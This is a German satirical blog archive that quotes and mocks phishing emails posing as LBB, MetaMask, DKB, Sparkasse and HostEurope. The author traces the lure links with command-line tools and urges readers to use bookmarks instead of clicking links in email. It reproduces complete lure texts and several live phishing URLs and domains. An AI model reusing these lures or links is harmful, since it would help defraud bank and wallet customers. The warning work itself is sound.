Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Kategoriearchiv „Phishing“

Re : Bitte reaktivieren Sie Ihr Konto!

Mittwoch, 6. Juli 2022

Abt.: Wie dumm kann eine Phishing-Spam sein? 🤦‍♂️️

Von: LBB – Kundenservice <schulden@rechtsanwalt-ruff.de>
An: schulden@rechtsanwalt-ruff.de

Die ist ja gar nicht für mich! 🤭️

lun. 4 avr. à 17:11

Genau mein Datumsformat! 😍️

Ihre LBB-Bank informiert Sie darüber, dass Sie den neuen mTan-Service aktivieren müssen, um Ihre Zahlung im Internet abzusichern :
Aktualisiere meine Informationen

Das ist ja nett, dass „meine“ LBB mich informiert. Ich habe da gar kein Konto. Und der Link führt auch zu einer ganz komischen Website, die nicht die Website der Landesbank Berlin ist. 🤔️

$ lynx -dump https://saw-erp.in/direct/access/T83256674/
   LBB Kreditkarten-Banking
   Anmelden
   Benutzername
   ____________________
   [1]Benutzername vergessen
   Passwort
   ____________________
   [see.png]
   [2]Passwort vergessen
   (BUTTON) LOGIN
   [cad.png]
   Erstregistrierung starten
   Sie haben bereits Start-Zugangsdaten erhalten?
   (BUTTON) Erstregistrierung
   Start-Zugangsdaten anfordern
   Sie haben noch keine Start-Zugangsdaten erhalten?
   (BUTTON) Start-Zugangsdaten

Verweise

   1. https://saw-erp.in/direct/access/T83256674/
   2. https://saw-erp.in/direct/access/T83256674/
$ _

Alle Daten, die man dort eingibt, gehen direkt an Verbrecher. Das ist ja auch der Grund, weshalb man solche Websites niemals über einen Link in einer E-Mail aufruft, sondern dafür immer ein Lesezeichen im Webbrowser anlegt und für jeden Besuch der Website benutzt. Dann kann einem niemand einen giftigen Link in einer E-Mail unterschieben. Weil man nicht in die E-Mail klickt. So einfach ist es, vor der häufigsten Betrugsform im Internet geschützt zu sein. 🛡️

Macht das! Es spart Geld und Nerven. 👍️

Und vor allem: Klickt niemals in eine E-Mail, die nicht digital signiert ist! Schon gar nicht, wenn es im weitesten Sinne des Wortes um Geld geht, aber auch nicht bei scheinbar „ungefährlichen“ Dingen wie Social-Media-Accounts. Beinahe alle so genannten „Cyberangriffe“ – ein unfassbar dämliches Wort übrigens, weil das mit diesem Wort Beschriebene nicht einmal in einem skurillen Sinn mit Kybernetik zu tun hat; aber auch ein Wort, das ein klares Bekenntnis zur vollumfänglichen digitalen Inkompetenz derjenigen ist, die es benutzen – laufen zurzeit über E-Mail. Es sind keine „Hacks“, wie der Journalist euch denken lässt. Es sind E-Mails mit Links oder mit Anhängen, die vom Empfänger beklickt werden. 🐒️🖱️

Links in E-Mails sind giftig. Anhänge von E-Mails sind giftig. Der Absender einer E-Mail kann beliebig und sehr leicht gefälscht werden und sagt gar nichts über die Herkunft einer E-Mail. 💀️

Eine E-Mail, die nicht digital signiert ist, kann von jedem kommen. Sie sollte genau so behandelt werden. Geklickt wird nur in E-Mail, die digital signiert ist und deren digitale Signatur man überprüft hat, so dass man weiß, dass der Absender im Besitz eines privaten Schlüssels ist – und natürlich nur, wenn man diesem Absender auch vertraut. 🔍️✅️

Zum Glück für uns alle ist die gesamte dafür nötige Software Frei, kostenlos verfügbar und man braucht für ihre Nutzung nur klicken zu können. Warum ihre Bank, ihr Chef und Behörden der Bundesrepublik Deutschland nicht digital signieren, müssen sie ihre Bank, ihren Chef und die Behördenleiter in der Bundesrepublik Deutschland fragen. Aber die reden halt lieber über „Cyberangriffe“, weil so ein Wort besser als „Wir haben von nichts eine Ahnung, wir haben Angst davor, Kenntnisse zu erwerben und wir sind vollständig beratungsresistent“ klingt. Cyber Cyber! 😡️

Und deshalb gilt: Dettelbach ist überall. Und wenn man dann nicht einmal eine Datensicherung hat, die man zurückspielen kann, wird eben Lösegeld an Kriminelle gezahlt. Im Falle der Verwaltung wird dieses Lösegeld aus Steuermitteln finanziert. Die Nutzung Freier und kostenloser Software wäre viel billiger gewesen. Für das eingesparte Geld hätte es bessere Verwendungen als die staatliche Förderung einer kriminellen Schattenwirtschaft gegeben. Ich finde, dass darüber viel zu wenig Menschen zornig werden. 😠️

You have received this message because you have a subscription for „Mitteilung der Landesbank“ news. If you wish to no longer receive emails from us you can unsubscribe.

Das ist ja toll, dass ich E-Mails mit Warnungen und Kundenhinweisen bei der Berliner Landesbank einfach abbestellen kann. Kann ich bitte auch Mahnungen und Zahlungsaufforderungen abbestellen? 🤡️

Our mailing address is: Landesbank Berlin AG

Meine Mailadresse ist der Große Garten von Hannover. 😎️

Ich habe eingangs die Frage aufgeworfen, wie dumm eine Phishing-Spam sein kann. Diese Spam beantwortet die Frage rundheraus mit „Ja“. 😵️

The crypto downtrend

Donnerstag, 23. Juni 2022

Von: Metamask <master@gsw.bidivapor.com>
An: gammelfleisch@tamagothi.de

Ich kenne den Absender nicht. 👤️

logo (Metamask-Logo)

Ich kenne nur FFP2-Masken. 😷️

Aber mal im Ernst. Diese Spam kommt nicht vom Krypto-Wallet-Dienstleister MetaMask. Das sieht man zum Beispiel daran, dass sie bei mir ankommt, und ich habe mit MetaMask nichts zu tun. Ich benutze kein Kryptogeld. Aus ethischen Gründen. Die Erde ist zu schade dazu, sie in einer absurd-dadaistischen selbstbezüglichen Spielhölle wegen irgendwelcher Wettzettel auf die zukünftige Quote ebendieser Wettzettel zu verbrennen. Gier ist so unfassbar dumm und destruktiv! 🔥️

Spätere Generationen – wenn es sie überhaupt geben wird – werden mit Sicherheit eine nicht so tolle Meinung von unserer Idee haben, genau diese dumme und destruktive Gier mit dem scheinwissenschaftlich-ideologischen Überbau des Kapitalismus zu tarnen und zur Grundlage unseres gesamten Miteinanders zu machen. Mir kommt diese Idee jetzt schon so irre wie die religiösen Rasereien des Mittelalters vor, und sie wird leider auch mit der gleichen fanatischen Inbrunst vorangetrieben wie diese religiösen Rasereien. Dass es kein unbegrenztes Wachstum auf begrenztem (oder im Falle raumfahrender Zivilisationen: lediglich polynomiell mit der Zeit größer werdendem) Raum geben kann, ist eine Tatsache, die jeder Mensch nach einem Grundkurs der Analysis verstehen müsste, also zum Beispiel jeder Abiturient in der Bundesrepublik Deutschland. Die Exponentialfunktion wächst nun einmal schneller als jede polynomielle Funktion. Wer das nicht wahrhaben will, ist nicht besser als die Idioten, die wider gesichertem und jederzeit relativ leicht überprüfbarem Wissen daran glauben, dass die Erde eine Scheibe sei. Ach ja: Praktisch der gesamte Deutsche Bundestag will das nicht wahrhaben… 😖️

The seasons of „up only“ in crypto has come to a close. As you may have noticed the crypto market is very unstable at the moment. We do everything in our power to recover from this dip.

To make the crypto market stable again, we are busy clearing out all inactive wallets. After your wallet is deleted, you will lose all your funds. To prevent your account from being deleted, you must verify it before 26/06/2022.

Oh, die schmeißen einfach alte Wallets weg bei MetaMask. Damit der Kryptomarkt wieder stabil wird. Lange nicht mehr so gelacht. Das klingt ja fast wie ein ganz dummes Phishing. Klicken sie mal bitte aus einem unfassbar blöden, vorgeschobenen Bullshit-Grund in eine Spam…

What if I don’t complete the wallet verification?
If you don’t verify your wallet, your wallet will be restricted.

…und machen sie dann in der sich öffenden Website, was Spammer von ihnen wollen, denn sonst können sie ihr Bankkonto… ähm… die Wallet nicht mehr benutzen und kommen nicht mehr an ihr Geld. Neben dem Vorschussbetrug eine der ältesten Betrugsmaschen des Internet. 🎣️

Darauf fällt doch keiner von den dreißig Millionen Metamask-Nutzern mehr rein. Die sind doch alle digital natives, mit Internetdiensten aufgewachsen und kennen so etwas, oder? ODER? 🙄️

Es wäre so schön, wenn ich das glauben könnte. ☹️

Verify your wallet

Wer da klickt, lasse alle Hoffnung fahren! 💀️

Der Link geht nicht in die Website von MetaMask, sondern zum in Twitter eingebauten und nur über Twitter nutzbaren URL-Kürzer t.co. Das ist schon einmal sehr bemerkenswert, dass der Link gekürzt wurde, indem die Originaladresse einmal getwittert wurde. Niemand, der als Finanzdienstleister ernstgenommen werden will, würde…

  1. …überhaupt URL-Kürzer verwenden, die irgendwelchen Dritten eine für Kunden gedachte URL offenbaren; und
  2. …schon gar nicht auf die Idee kommen, eine für Kunden gedachte URL zu twittern, den dabei im Tweet entstehenden Link in die Zwischenablage zu kopieren und anschließend diesen Tweet wieder zu löschen, um auf diese sehr verschrobene Weise eine URL zu kürzen.

Warum nicht? Wer das wirklich nicht versteht, unterhalte sich bitte mit einem erwachsenen Menschen normaler Lebenserfahrung darüber! Dieser Text ist eh schon wieder etwas länglich geworden. Ihr kriegt die Kontoauszüge eurer Bank ja auch nicht als Postkarte, und schon gar nicht werden eure Kontoauszüge einfach an die nächste Litfasssäule gekleistert. Obwohl ich das ja mal für eine sehr interessante Lektüre halten würde… 😎️

If the button above doesn’t work, try the page below.

https://metamask.io/accounts/wallet-verification=46798785266×05b306da87c05ab8307b1axe7e00

Obwohl das aussieht, als sei es ein anderer Link: Es ist eine HTML-formatierte E-Mail, und die URL ist nur der verlinkte Text. Der Link führt auf genau die gleiche über Twitter gekürzte URL wie der vorherige. Diese sehr banale Form der Irreführung ist nicht nur ein wunderbares Beispiel dafür, warum HTML-formatierte E-Mail einfach nur böse, schlecht und gefährlich ist und deshalb abgeschafft und geächtet gehört, sondern sie tritt auch nur in E-Mails auf, die man getrost löschen kann: Reklame und Spam. Die Tatsache, dass Werber und Spammer oft verblüffend ähnliche Techniken verwenden, zeigt, dass sie aus einem Holz geschnitzt sind. Leider ist Reklame immer noch legal. 😐️

Wer einen der beiden Links klickt, kommt auf eine „liebevoll“ nachgemachte MetaMask-Seite, die aber in einer Domain liegt…

$ whois protectmy-io.xyz | grep -i ^creation
Creation Date: 2022-06-22T02:01:36.0Z
$ _

…die gerade erst ganz frisch für diesen Betrug eingerichtet wurde. Alles, was man dort eingibt, geht direkt an Kriminelle. Und natürlich soll man dort etwas eingeben, und zwar…

Screenshot der Phising-Site

…die Recovery-Phrase für die eigene Wallet. Damit wird die eigene Wallet direkt an Kriminelle übergeben. Die können dann damit machen, was sie wollen. Natürlich werden sie erstmal leerräumen. Im Gegensatz zu einem Bankkonto gibt es leider keine Möglichkeit, eine Buchung rückgängig zu machen. Aber Kriminelle brauchen ja auch immer wieder Möglichkeiten, ihre Geldflüsse vor den Ermittlungsbehörden zu verschleiern. Und das wird mit Sicherheit auch unter Verwendung solcher gephishter Wallets geschehen. Wer auf dieses Phishing reinfällt, hat also nur Kosten und Ärger. 😕️

Zum Glück für uns alle gibt es einen sicheren, kostenlosen und ganz einfachen Schutz gegen Phishing, eine der häufigsten Kriminalitätsformen im Internet: Niemals in eine E-Mail klicken! Wer sich für die Websites seiner Bank, seiner häufig genutzten Dienstleister, seiner Händler Lesezeichen im Webbrowser anlegt und sich angewöhnt, diese Websites nur über diese Lesezeichen aufzurufen, kann gar keinen giftigen Link von einem Betrüger untergeschoben bekommen. Nach dem Empfang einer derartigen E-Mail mit Link einfach die entsprechende Website über das Browser-Lesezeichen aufrufen und sich ganz normal anmelden. Wenn sich dabei zeigt, dass an den meist alarmierenden Behauptungen in der E-Mail nichts dran ist, hat man einen dieser gefürchteten Cyber-Angriffe abgewehrt. So einfach geht das! 🛡️

Macht das bitte! 😉️

Und nein, Schlangenöl hilft nicht. Die Domain der Phishing-Website ist einfach noch ein bisschen zu neu…

$ surbl protectmy-io.xyz
protectmy-io.xyz	okay
$ _

…um in den Blacklists aufzuscheinen. Wenn sich das demnächst ändert, wird einfach eine neue Domain registriert und dort mit dem gleichen Phishing weitergemacht. Die Betrüger leben davon, dass naive Menschen auf ihren Betrug reinfallen und achten deshalb sehr wohl darauf, dass der Betrug noch funktioniert.

96372105 42948 87msw2

Samstag, 11. Juni 2022

Was mag dieser kryptische Betreff nur bedeuten? 🤔️

Von: DKB_Supp <test@BESHMON.COM>
An: gammelfleisch@tamagothi.de

Keine weiteren Fragen! 🤭️

Nein, die DKB ist das nicht. Die schreibt ganz sicher nicht an irgendwelche Mailadressen, die mit einem Harvester auf Websites eingesammelt wurden. Aber vermutlich würde die DKB in ihren Betreff auch etwas sinnvolleres als eine aus Empfängersicht idiotische Ziffern- und Buchstabenfolge schreiben. 🔍️

Lieber Kunde,

Genau mein Name! 👏️

DKB Services Informieren Ihr Konto und Ihre DKB-Karte wurden gesperrt, für das Nichterhalten der zuvor von uns angeforderten Daten.

Spätestens hier sollte wirklich jeder Mensch bemerken, dass es eine Phishing-Spam ist. Warum? Weil das Deutsch einfach nur zum Kringeln ist, und weil eine echte Bank immer die Kontonummer dazuschreiben würde, die gemeint ist. Es sind gar nicht so wenige Bankkunden, die mehrere Konten haben, zum Beispiel, um Einkünfte aus selbstständiger Tätigkeit klar von ihrem persönlichen Geldumsatz zu trennen. Diese Finanzämter können aber auch ganz schön garstig werden, wenn sie Belege unübersichtlich finden. Von daher ist jede E-Mail, die angeblich von einer Bank kommt und von schweren Problemen mit dem Konto spricht, aber die Kontonummer nicht nennt, eine Phishing-Spam. 💡️

Da hilft es dann auch nicht…

Freischaltcode: 7GT4F4R8D4

…wenn im Betreff und in der Spam lustige Löffel Buchstabensuppe abgeschrieben wurden, die nichts mit dem Konto zu tun haben. 🤡️

Jetzt bestätigen

Wer da klickt, lasse alle Hoffnung fahren! Natürlich geht der Link nicht zur DKB, und natürlich ist er auch nicht direkt gesetzt:

$ location-cascade http://5c9bruzz7y7u59.igm.co.id/bWFyZ3JldEBob3JyaWJpbGUtZGljdHUuZGU=
     1	https://vertigouniversal.com/dkb
     2	https://vertigouniversal.com/dkb/
     3	banking?session=geschaeftskunden/branchen/wohnungswirtschaft/wohnwirtschaftliche_bilanzanalyse/
$ surbl vertigouniversal.com
vertigouniversal.com	okay
$ _

Wer sich darauf verlässt, durch Security-Schlangenöl oder Browser-Addons vor dem Besuch von Phishing-Sites geschützt zu sein, hat hier verloren. Die Domain ist zurzeit noch nicht als Betrüger-Website gelistet. Das wird sich erst in den nächsten Stunden ändern. 😐️

Aber das macht nichts, denn es gibt einen hundertprozentigen Schutz gegen Phishing, die vermutlich (nach dem Vorschussbetrug) zweitälteste Trickbetrugsform im Internet: Niemals in eine E-Mail klicken! Wer sich für die Website seiner Bank (und andere, vergleichbar wichtige und für Verbrecher attraktive Websites) ein Lesezeichen im Webbrowser anlegt und diese Website nur über dieses Lesezeichen besucht, kann keinen giftigen Link in einer E-Mail untergeschoben bekommen. Und damit bricht diese Betrugsmöglichkeit in sich zusammen. 👍️

In diesem Fall hätte man einfach die Website der DKB über das Browser-Lesezeichen aufgerufen, sich dort ganz normal angemeldet und gesehen, dass das in der Phishing-Spam behauptete Problem gar nicht existiert. Und schon wurde einer dieser fiesen „Cyberangriffe“ abgewehrt (und man hat sich vermutlich eine Menge Ärger erspart). So einfach geht das! 🛡️

Also macht das bitte! Es kostet nichts, ist cool und sicher! 😎️

Wir erinnern Sie daran, dass Sie mit Ihrer Karte keine Zahlungen mehr leisten können wenn diese Überprüfung nicht innerhalb von 48 Stunden nach Erhalt erfolgt

Wenn eine Bank so etwas wie „Klicken sie mal in die E-Mail, weil wir uns einen tollen Grund dafür ausgedacht haben, und wenn sie das nicht tun, geben wir ihnen einfach ihr Geld nicht mehr“ schreibt, nennt man das übrigens Nötigung. Deshalb schreiben Banken das auch nicht so, selbst dann nicht, wenn sie gern würden… 😉️

Solche hetzenden Phrasen gibt es nur in Phishing-Spam. 💩️

Wichtiger Hinweis zu Ihrem Konto

Samstag, 21. Mai 2022

Wie, wurden mir plötzlich und grundlos ein paar Milliönchen überwiesen?

Wichtige Mitteilung

Lieber Kunde,

Alle Sparkassen-Kunden haben eine essenzielle Information. Bitte bestätigen Sie auf diese Benachrichtigung bis zum 23.05.2022.

Mittilungen einsehen

Herzlichste Grüße und viel Glück, Ihre Sparkasse.

IT-Abteilung der Sparkasse.

Nein, ich soll einfach nur in eine E-Mail klicken, weil die Spaßkasse es nicht hinbekommt, in diese Mail reinzuschreiben, was sie mir sagen will. Und zu diesem Klick wünscht sie mir auch noch viel Glück, die Spaßkasse. 😂️

Der Link geht natürlich nicht zur Spaßkasse, sondern nach einer Google-Umleitung – Google ist stets ein dicker Freund der Spammer und Betrüger – in die Domain sparka (strich) itservice2022 (punkt) com, die…

$ surbl sparka-itservice2022.com
sparka-itservice2022.com	LISTED: ABUSE
$ _

…bereits wegen Spam auf allen Blacklists steht. Um Analysen zu erschweren, kann man die dortige Website nur betrachten, wenn ein langer URI-Parameter mit einer eindeutigen ID aus der Spam dranhängt, ansonsten behauptet diese Seite…

$ lynx -dump https://sparka-itservice2022.com/
   Error 404 – Page not found
$ _

…dass sie gar nicht existiere, um Analysen zu erschweren. Weil diese Betrüger unnötige Mühe vermeiden – sonst könnten sie ja gleich arbeiten gehen – wird das aber nur als Text ausgegeben. Die zusätzliche Programmzeile, dass dieser Fehler auch als HTTP-Statuscode übermittelt wird, war schon zu viel Mühe für diesen Betrug. 🛠️

Wenn man in die Spam klickt, gehen alle Daten, die man in die „liebevoll“ nachgemachte Spaßkassen-Website eingibt, direkt zu Betrügern. Es ist natürlich ein Phishing. 🎣️

Zum Glück für uns alle gibt es einen ganz einfachen und hundertprozentig sicheren Schutz gegen Phishing: Niemals in eine E-Mail klicken! Stattdessen für alle Websites, die man regelmäßig nutzt, Lesezeichen im Webbrowser anlegen und diese Wesites nur über diese Lesezeichen aufrufen. Auch, wenn man in einer E-Mail mit Link zum Besuch der Website aufgefordert wird. Dann kann einem kein Krimineller mehr einen vergifteten Link unterschieben. 💣️

Das ist nicht einmal ein Komfortverlust, denn man muss in jedem Fall einfach nur klicken. 🖱️

Wenn man zum Beispiel nach dem Erhalt dieser relativ schlecht gemachten Phishing-Spam die Website der Spaßkasse über das Lesezeichen aufruft, sich dort ganz normal anmeldet und nach der Anmeldung keinen Hinweis auf diese angeblich so wichtige Sache angezeigt bekommt, hat man einen dieser fiesen Cyberangriffe abgewehrt. So einfach geht Computersicherheit! Jeder Mensch kann das. 🛡️

Bitte macht es so und klickt niemals in E-Mail! 😉️

Sparkasse GreenVest Anlageangebote

Dienstag, 3. Mai 2022

Natürlich kommt diese Spam nicht von der Spaßkasse. Mein Exemplar wurde über eine chinesische IP-Adresse versendet und hat einen Server der Spaßkasse nicht einmal aus der Ferne gesehen. 🤥️

Und der Spammer hat sich nicht einmal Mühe mit seinem Spamskript gegeben. Im folgenden Text sieht man manchmal [alternative Formulierungen | verschiedene Satzbauteile] in eckigen Klammern, damit ein Spamfilter nicht so leicht [die Muster erlernen kann | den Müll aussortieren kann]. Hier sollte das Spamskript natürlich zufällig eine der gegebenen Alternativen auswählen, aber das ist fehlgeschlagen, weil der Spammer sein Spamskript nicht verstanden hat. Er hätte natürlich einen kleinen lokalen Test machen können, bevor er hunderttausende kleiner Denkmäler für seine völlige Inkompetenz in die wehrlosen Postfächer macht, aber er ist ja Spammer. Und wenn er sich Mühe geben wollte, könnte er doch gleich arbeiten gehen. 🛠️

Ich befürchte dennoch, dass das ein sehr erfolgreiches Phishing wird. Denn wenn den Menschen Geldbündel vor die Nase gehalten werden und man ihnen auch noch etwas von ökologischer Ethik dazu vorlügt, dann wird die Gier das Hirn durch einen Sack Falschgeld ersetzen. 💰️

Logo der Sparkasse

Die Grafiken in dieser Spam¹ sind kostenlos und anonym bei Imgur gehostet. Das ist mittlerweile dermaßen typisch für alle Formen der Spam geworden, dass ich eine entsprechende Regel zum Aussortieren des Imgur-Mülls habe, und hoffentlich wird das bald überall Normalität sein. Es tut mir ja ein bisschen leid für Imgur, aber wenn man Spam nicht bekämpft, wenn man die leidige Arbeit mit seinem windigen Geschäftsmodell der ganzen Welt aufbürdet, so wie es Imgur tut, dann wird man eben selbst zur Spam. Und genau so behandelt. Möge der Pleitegeier sein Fresschen haben! 🍽️

Das überlagerte Wort „SPAM“ ist natürlich von mir. Ich bin nicht so gern Bildhoster für Kriminelle. 🙃️

Zu schade, dass jede Mailsoftware standardmäßig (und ohne irgendeinen sachlichen Grund, da man gut formatierte Dokumente an eine Mail anhängen kann) HTML-formatierte E-Mail versendet. Sonst könnte man den ganzen HTML-Müll aussortieren. Die einzigen, die HTML-formatierte E-Mail brauchen und ihre Möglichkeiten nutzen, sind Werber, Blender und Spammer. Sonst braucht und nutzt das niemand. 😐️

GreenVest >
Sinnlose Grafik eines Paragliders in einer Berglandschaft, darunter ein logoähnliches Objekt

Ach, eine grüne Weste wollen sie sich anziehen? 😁️

Pilotprojekt:
GreenVest

Jetzt verfugbar

Nur Umlaute sind mal wieder nicht verfugbar. 😅️

Exklusive Anlagenangebote

Exklusiv wie eine Postwurfsendung. 💩️

Sehr geehrte Kunden & Kundinnen,

Genau mein Name! 👍️

(Ich bin übrigens kein Kunde der Spaßkasse und werde niemals in meinem Leben einer sein. Aus Gründen.)

Als langjahriger [Kunde der Sparkasse|Inhaber eines Sparkassen Kontos], haben Sie nun die einmalige Chance ein [auf Sie zugeschnittenes|fur Sie personalisiertes] Anlagenangebot in unserem Pilotprojekt Sparkasse GreenVest zu erstellen. Fokussiert auf erneuerbare Energien: Okostrom aus Wind, Sonne & Co – Sparkasse GreenVest investiert Ihr Geld in exklusive und lukrative Investmentvehikel.

So so, Okostrom-Investmentvehikel. 🤣️

Habe ich eigentlich schon erwähnt, dass die Spaßkasse mit dieser Spam nichts zu tun hat? Aber eigentlich sollte das jeder Mensch bemerken.

Profitieren Sie von bis zu 14,5% Rendite jahrlich und investieren Sie gemeinsam mit der Sparkasse in eine grune Zukunft.

Hui, was für ein Renditeversprechen! Und „grun“ ists auch! Mit integriertem Ablasszettel für die Generation „Ökologische Betroffenheit durch Bambi-Film“, der man sogar „grüne“ Kraftstoffe fürs Auto verkaufen kann, ohne dass sich einer dieser bürgerlichen Idioten aus der spätkonsumistischen Dekadenzhölle daran stört, dass sein im Regelfall überdimensioniertes Auto mit Brot betankt wird. 🤮️

Genau die richtige „Zielgruppe“ für einen Betrug. 🎯️

Aber ich schweife ab… 😉️

Weitere Informationen

Wer da klickt, lasse alle Hoffnung fahren! Es gibt eine Weiterleitung über den dicksten Freund des Spammers, über Google, in die Domain deka (strich) fondsplan (punkt) com, die…

$ host deka-fondsplan.com
deka-fondsplan.com has address 194.87.48.72
$ country 194.87.48.72
194.87.48.72 is from Russian Federation (RU) Russian Federation (RU)
$ surbl deka-fondsplan.com
deka-fondsplan.com	LISTED: ABUSE
$ _

…zu einem russischen Server aufgelöst wird und bereits wegen massenhafter Verwendung in der Spam auf allen Blacklists dieser Welt zu finden ist. ⚠️

Und dort bekommt man die Gelegenheit, etwas unglaublich Dummes zu tun, indem man in einer „liebevoll“ nachgemachten Sparkassen-Website lauter Daten noch einmal eingibt, die der Spaßkasse schon längst bekannt sind, um auf diese Weise Verbrechern sein Bankkonto zu übergeben. 🤦‍♂️️

  • Weil in einer E-Mail mit so schönen Grafiken Fuffzehn-Prozent-Mondrenditen versprochen werden. 🤦‍♂️️
  • In einer unpersönlich formulierten E-Mail ohne Umlaute. 🤦‍♂️️
  • In einer E-Mail, deren (vom Spammer extrem leicht fälschbare) Absenderadresse noch nicht einmal nach Spaßkasse aussah. 🤦‍♂️️
  • In einer E-Mail, die zu einer Website führt, die noch nicht einmal in der Domain der Spaßkasse liegt, sondern in einer zwar gut klingenden, aber letztlich doch „schrägen“ Domain, wie man beim Blick auf die Adressleiste des Browsers sofort bemerkt. 🤦‍♂️️

Okay, wenn sie darauf reingefallen sind, will ich gar nicht weiter bissig über ihren Schaden spotten, aber hier war auch ohne Blick in den Header und Quelltext der Mail und ohne oberflächliche Analyse außerordentlich einfach zu bemerken, dass mit dieser E-Mail etwas nicht stimmen kann. Nicht jede Spam ist so schlecht. 😉️

Zum Glück für uns alle gibt es einen absolut sicheren Schutz gegen Phishing, der funktioniert, bequem ist und nichts kostet: Niemals in eine E-Mail klicken! 🖱️🚫️

Wenn man sich für Kriminelle „interessante“ Websites wie die Website seiner Bank als Lesezeichen im Browser anlegt und sich angewöhnt, diese Websites nur noch über das Lesezeichen aufzurufen, statt in E-Mail zu klicken, kann einem kein Verbrecher mehr einen giftigen Link unterschieben. Diese Sicherheit kommt übrigens ohne jeglichen Komfortverlust, denn in beiden Fällen braucht man nur zu klicken – aber den Link aus den Browser-Lesezeichen können Kriminelle nicht ohne Aufwand manipulieren. Wenn man eine E-Mail seiner Bank erhalten hat, einfach ganz normal über das Browser-Lesezeichen die Website seiner Bank aufrufen und sich dort wie gewohnt anmelden. Wenn man dann nicht ebenfalls die Hinweise aus der Mail präsentiert bekommt, hat man einen dieser fiesen Cyberangriffe abgewehrt. Selbst, wenn die Phishing-Spam einmal wesentlich besser als dieses Exemplar sein sollte. So einfach geht das! 🛡️

Und ja, eine Bank, die ihren Kunden mit E-Mail unseriös aussehende Angebote macht, wird ihre Kunden auch nach einer Anmeldung in die Fernkontoführung² mit derartigen Angeboten belästigen. Denn die Bank verdient daran immer besser als der Kunde. Im Geschäftsleben wird man nun einmal übern Tisch gezogen. Gefällt mir auch nicht. Ist aber so. 😐️

¹Meine Mailsoftware lädt solche Grafiken aus dem Web nicht nach, aber ich schaue mir natürlich den Quelltext von Spams an und weiß daher, wie die Spam aussehen soll.

²Von Werbern und ihren stinkenden Brüdern, den Journalisten, im Regelfall als „Online-Banking“ bezeichnet.

Mittteilung Ihrer Sparkasse

Sonntag, 1. Mai 2022

Ich kommentiere den Strunz mal nicht weiter, denn dieses wundervolle Deutsch demaskiert sich selbst:

Wichtige Mitteilung
Sehr geehrte_r Kunde_in

Das exklusive Sparkassen Online Banking System bietet unseren Kontoführend*in neue Möglichkeiten um Ihre Erfahrung zu verbessern.

Folgende Updates wurden aktualisiert:

- Zügigere Überweisung innerhalb der Europäische Union
– Neuartige Sicherheitssysteme gegen Hackerangriffe
– Ein internes elektronisches Postfach für schnellere Termine mit unseren Mitarbeiter_in
– TAN-Frei Überweisungen an Freunde und Familie umsetzen

Wir die Sparkasse möchten schnellstmöglich diese Neuerungen umsetzen. Damit diese neuen Updates aktualisiert werden können, bitten wir Sie als geschätzter Sparkassen Kunden um Ihre Mitarbeit.

Sie können die folgende Umstellung ganz einfach abwickeln. Es folgt dann eine manuelle Kontrolle Ihrer eingegebenen Daten von unseren .

Zur Bestätigung

Wir schätzen Ihre Zeit als treuer Kunde.

Beste Grüße und viel Glück

IT-Abteilung der Sparkasse

Hauptsache für die Spammer ists allerdings, dass niemand das gewünschte Glück beim Denken hat. 😁️

Natürlich geht der Link nicht zur Website irgendeiner Sparkasse, sondern erstmal zum größten Freund des Spammers und Betrügers, zu Google. Dort gibt es eine Weiterleitung zu spk (strich) mitarbeiterportal (punkt) com mit schönen Grüßen aus Russland. Alle Daten, die man dort eingibt (und die die richtige Spaßkasse schon längst kennt), gehen direkt an Verbrecher. Hinterher wird man noch einmal angerufen und „darf“ eine betrügerische Überweisung seines Geldes mit den aktuellen Sicherheitserhöhungsversuchen der hiesigen Bankhäuser abnicken, wissenschon, nur für einen Test. Aber das ist nicht der einzige Schaden, der entsteht. ☹️💸️

Deshalb klickt man ja auch nicht in eine E-Mail. Wer sich die Website seiner Spaßkasse als Lesezeichen im Browser abgelegt hat und diese Website nur über dieses Lesezeichen aufruft, kann keinen giftigen Link untergeschoben bekommen. Einmal normal bei der Spaßkasse über das Browser-Lesezeichen anmelden, feststellen, dass das Problem gar nicht existiert und den kriminellen Sondermüll löschen. So einfach und bequem geht Computersicherheit! 🛡️

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
